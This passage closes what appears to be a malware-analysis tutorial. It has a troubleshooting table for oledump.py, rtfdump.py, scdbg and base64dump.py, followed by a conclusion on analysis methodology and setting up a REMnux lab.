| Missing the correct stream in oledump.py | Not checking all streams | Use oledump.py without flags first to see the full listing and identify 'M' markers |
| Forgetting -H flag with rtfdump.py | Confusion between hex view and binary extraction | Remember: -H converts hex characters to bytes; without it you get text output |
| Incorrect shellcode offset in scdbg | Assuming shellcode starts at offset 0 | Use XORSearch or manual hex analysis to find NOP sleds or GetEIP patterns |
| Not enabling fopen in scdbg for context-dependent shellcode | Shellcode reads from the original file | If the shellcode accesses the parent document, enable fopen in scdbg or pass addhandle to jmp2it |
| Skipping the -d flag in base64dump.py | Misunderstanding output format | -d outputs raw binary; without it you might get hex or ASCII representations |

Conclusion

Malware analysis is as much about methodology as it is about tools. Each sample in this exercise required a slightly different approach, but the underlying process remained consistent: observe, hypothesize, extract, verify. Whether you're looking at a compromised website's traffic, an obfuscated JavaScript file, a suspicious PDF, or a macro-laden Office document, the goal is always to answer the same questions: What does this do? How does it do it? And what would it have done if it had succeeded?

The breadth of techniques covered here — from browser debugging and JavaScript emulation to PDF stream extraction, shellcode carving, and p-code disassembly — reflects the reality of modern threat analysis. Attackers use the full range of file formats and delivery mechanisms available to them. As analysts, we need to be equally versatile.

If you're building your malware analysis skills, I'd encourage you to set up a similar lab environment (REMnux + Windows VM), grab some samples, and work through them systematically. The hands-on experience of peeling back obfuscation layers and watching a hidden payload reveal itself never gets old.

Stay curious, stay skeptical, and always verify.
